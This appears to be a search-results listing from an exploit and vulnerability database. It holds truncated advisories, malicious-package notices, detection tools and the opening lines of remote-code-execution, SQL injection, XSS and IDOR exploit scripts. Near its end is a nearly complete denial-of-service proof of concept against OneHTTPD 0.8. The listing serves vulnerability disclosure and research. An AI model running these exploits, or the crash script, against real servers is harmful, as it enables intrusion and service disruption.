22 matches found
USN-7762-1: pip vulnerabilities
Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information. This update addresses the issue in the Requests module bundled into pip in Ubuntu 22.04 LTS. CVE-2023-32681 I...
Beebeeto-framework
This is a Python framework for building and executing proof-of-concept POC exploits, specifically targeting the HttpFileServer HFS vulnerability. The framework is called Beebeeto and is maintained by the n0tr00t security team. The framework provides a set of tools and libraries for creating and...
Malicious code in new-requests-module (PyPI)
--- -= Per source details. Do not edit below this line.=-...
MAL-2025-41707 Malicious code in new-requests-module (PyPI)
--- -= Per source details. Do not edit below this line.=-...
MAL-2025-965 Malicious code in reqesst (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 8e4a4682ad923d5e0f2e444487e5f42a4bae8d753ecd747f7b652e407f5cc32f Importing the module downloads and starts an infostealer attempting to exfiltrate data and establishing persistence through autorun directory. --- Category:...
SmartAgent 1.1.0 Remote Code Execution
Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution Date: 01-10-2024 Exploit Author: Alter Prime Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com Version: Build v1.1.0 Tested on: Kali Linux An unauthenticated user can access a php script called...
The vulnerability of the GLPI system’s request, incident, and inventory management functions, related to improper elimination of special elements used in SQL commands, allows a hacker to modify another user’s account data and gain control over it.
The vulnerability of the GLPI system for requests, incidents, and computer equipment inventory management is related to the improper elimination of certain elements used in SQL commands. Exploiting this vulnerability allows a malicious actor to remotely modify another user’s account data and gain...
Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference
!/usr/bin/python3 Title: Hitachi NAS HNAS System Management Unit SMU Backup & Restore IDOR Vulnerability CVE: CVE-2023-5808 Date: 2023-12-13 Exploit Author: Arslan Masood @arszilla Vendor: https://www.hitachivantara.com/ Version: --id --sso " Create --host argument: parser.addargument "--host",...
The vulnerability of the GLPI system’s request, incident, and computer equipment inventory management system, related to the unlimited loading of dangerous type files, allows a violator to load any files into the system.
The vulnerability of the GLPI system for requests, incidents, and inventory management is related to the unlimited ability to upload dangerous files. Exploiting this vulnerability allows a malicious actor to upload any files into the system...
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Exploit
!/usr/bin/python3 Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored Authenticated Google Dork: intitle:"SCM Manager" intext:1.60 Date: 05-25-2023 Exploit Author: neg0x https://github.com/n3gox/CVE-2023-33829 Vendor Homepage: https://scm-manager.org/ Software Link:...
Exploit for OS Command Injection in Netgate Pfblockerng
pfBlockerNG T...
Exploit for Cross-Site Request Forgery (CSRF) in Cisco Industrial_Network_Director
PoC exploit for CVE-2019-18818, an unauthenticated password rese...
SUSE: Security Advisory (SUSE-SU-2016:0114-1)
The remote host is missing an update for the SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
SpamTitan 7.07 Remote Code Execution
Exploit Title: SpamTitan 7.07 - Remote Code Execution Authenticated Date: 2020-09-18 Exploit Author: Felipe Molina @felmoltor Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ Software Link: https://www.titanhq.com/signup/?producttype=spamtitangateway Version: 7.07 Tested on:...
Open-AudIT Professional 3.3.1 Remote Code Execution
Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution Date: 2020-04-22 Exploit Author: Askar CVE: CVE-2020-12078 Vendor Homepage: https://opmantek.com/ Version: v3.3.1 Tested on: Ubuntu 18.04 / PHP 7.2.24 !/usr/bin/python3 import requests import sys import warnings import random...
Web-Traffic-Generator - A Quick And Dirty HTTP/S "Organic" Traffic Generator
Just a simple poorly written Python script that aimlessly "browses" the internet by starting at pre-defined rootURLs and randomly "clicking" links on pages until the pre-defined clickDepth is met. I created this as a noise generator to use for an Incident Response / Network Defense simulation. Th...
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...
BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells
A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination, it automates the process of detecting the above. Purpose The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their...
MoinMoin - Arbitrary Command Execution
No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ?????????? ?????? ??? ??? ??? ?????????? ???????? ??? ??????? \r\n' ascii +=' ??????????? ???????? ??? ???? ??? ??????????? ???????? ??? ??????? \r\n' ascii +=' ??? ??? ??? ??...
OneHTTPD 0.8 - Crash PoC
Exploit for windows platform in category dos / poc from requests import get,ConnectionError as cerror from sys import argv iflenargv!=2: print '%s host' % argv0 else: buff = '/'245 script,host=argv try: get'http://'+host+':8080/'+buff except cerror: exit1 0day.today 2018-04-02...